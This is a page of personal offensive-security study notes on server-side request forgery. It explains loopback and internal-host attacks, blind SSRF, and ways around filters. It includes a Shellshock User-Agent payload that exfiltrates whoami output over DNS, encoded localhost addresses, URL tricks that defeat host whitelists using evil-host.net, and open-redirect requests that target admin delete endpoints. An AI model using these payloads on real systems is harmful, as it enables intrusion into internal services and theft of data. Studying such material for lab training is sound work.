☠️
smadi0x86 Playground
  • 💀Welcome to smadi0x86 Playground
    • 🍷Resources
    • 🚬Projects
    • 🎓Certifications
    • 📌Pinned
    • ❓Questions
    • 📞Contact
  • 🏞️Cloud Native
    • Docker
      • Quick Reference
      • Introduction
      • Containers
      • Images
      • Storage & Volumes
      • Security
      • Cheatsheet
    • Git
    • Serverless Framework
    • YAML
  • 🔨Software Engineering
    • System Design
    • Environment Variables
    • JSON Web Tokens
  • 👾Architecture
    • Computer Organization
      • Mathematics
    • C Language
      • Introduction
      • GCC Compilation
      • Libraries & Linking
      • I/O
      • Files
      • Pointers
      • Dynamic Memory Allocation
      • Data Types
      • Strings Manipulation
      • Bit Manipulation
      • Pre-processors
      • Macros
      • Type Qualifiers
    • C/C++ Build Systems
      • Fundamentals for Linking
      • Symbolic Linking
      • Cross-Platform Compilation
      • CMake for Building and Linking
      • Shared Libraries
      • Dynamic Linking and Dependency Management
    • Operating Systems
      • OS & Architecture
      • Processes
      • CPU Scheduling
      • Memory Management
  • 🛩️Cyber Warfare
    • Flight Physics
    • Communication
      • PWM & PPM
      • MAVLink
  • 🏴‍☠️Offensive Security
    • Active Directory
      • Introduction
    • Web Attacks
      • Server Side
        • OS Command Injection
        • Information Disclosure
        • Directory Traversal
        • Business Logic
        • Authentication
        • File Upload
        • SSRF
      • Client Side
        • CSRF
        • XSS
    • Recon
      • Active
        • Host discovery
        • Nmap
        • Mass Scan
      • Passive
        • Metadata
      • Web Applications
        • Discovery
        • Subdomains & Directories
        • SSL Certs
        • CMS
        • WAF Detection
      • Firewall Evasion
  • 😈Advanced Persistent Threat
    • C2
      • Sliver
    • Malware
      • Techniques
        • COFF Loader
      • Sektor7
        • Essentials
        • Common Techniques & APIs
  • 💌Certifications
    • AWS Certified Cloud Practitioner (CLF-C01)
      • Cloud Foundations
      • Domain 1: Cloud Concepts
      • Domain 2: Security and Compliance
      • Domain 3: Technology
      • Domain 4: Billing and Pricing
    • AWS Certified Solutions Architect - Associate (SAA-C03)
      • Foundation
    • Certified Kubernetes Administrator (CKA)
      • Core Concepts
      • Scheduling
      • Logging & Monitoring
      • Application Lifecycle Management
      • Cluster Maintenance
      • Security
      • Storage
      • Networking
      • Design Kubernetes Cluster
      • Kubernetes The Kubeadm Way
      • Troubleshooting
      • JSONPATH
      • Lightning Lab
      • Mock Exams
      • Killer Shell
    • Certified Kubernetes Security (CKS)
      • Foundation
      • Cluster Setup
      • Cluster Hardening
      • Supply Chain Security
      • Runtime Security
      • System Hardening
      • Killer Shell
    • (KGAC-101) Kong Gateway Foundations
      • Introduction to APIs and API Management
      • Introduction to Kong Gateway
      • Getting Started with Kong Enterprise
      • Getting Started with Kong Konnect
      • Introduction to Kong Plugins
  • 📜Blog Posts
    • Modern Solutions For Preventing Ransomware Attacks
Powered by GitBook
On this page
  • Exploiting
  • SSRF against the server itself
  • SSRF against other back-end systems
  • Blind SSRF vulnerabilities
  • Bypass
  • Bypass blacklist-based
  • Bypass whitelist-based
  • Bypassing SSRF filters via open redirection
  1. Offensive Security
  2. Web Attacks
  3. Server Side

SSRF

The website server make HTTP requests to the attacker domain.

Server side request forgery Induce the server-side application to make HTTP requests to an random domain of the attacker's choosing.

Exploiting

SSRF against the server itself

Attacker induces the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface for example: http://localhost/admin.

SSRF against other back-end systems

Attacker can exploit the SSRF vulnerability to access the other interface by submitting a internal HTTP request (http://192.168.1.105/admin).

Blind SSRF vulnerabilities

Response from the back-end request is not returned in the application's front-end response.

Find vulnerability:

Observe a DNS look-up for the supplied Burp Collaborator domain.

Example (Blind SSRF with Shellshock exploitation):

GET /path TTP/1.1
Host: test.net
...
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).aaabbbcccdddeeefff.burpcollaborator.net
...
Referer: http://192.168.0.1:8080
Upgrade-Insecure-Requests: 1
Connection: close

Bypass

Bypass blacklist-based

Change "127.0.0.1" to:

http://2130706433
http://017700000001
http://127.1
http://127.0.1
http://0.0.0.0
http://0
http://0x7f000001
http://2130706433
http://017700000001
http://[::]:80

  • Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose.

  • Obfuscating blocked strings using URL encoding or case variation.

Example:

value=http://127.1/%25%36%31dmin/delete?username=carlos

Bypass whitelist-based

  • Using "@" char https://expected-host@evil-host.net

  • Using "#" char https://evil-host#expected-host.net

  • Create a invalid domain https://expected-host.evil-host.net

  • Use URL-encode characters to confuse the URL-parsing code http://localhost:80%2523@evil-host.net/admin

Bypassing SSRF filters via open redirection

Example 1:

/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin

Example 2:

If "/product/stock" vulnerable to SSRF and /nextProduct vulnerable to OpenRedirect, Then:

// HTTP request

POST /product/stock vulnerable/1.1
Host: test.net
......
Connection: close

api=/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
PreviousFile UploadNextClient Side

Last updated 5 months ago

🏴‍☠️
Page cover image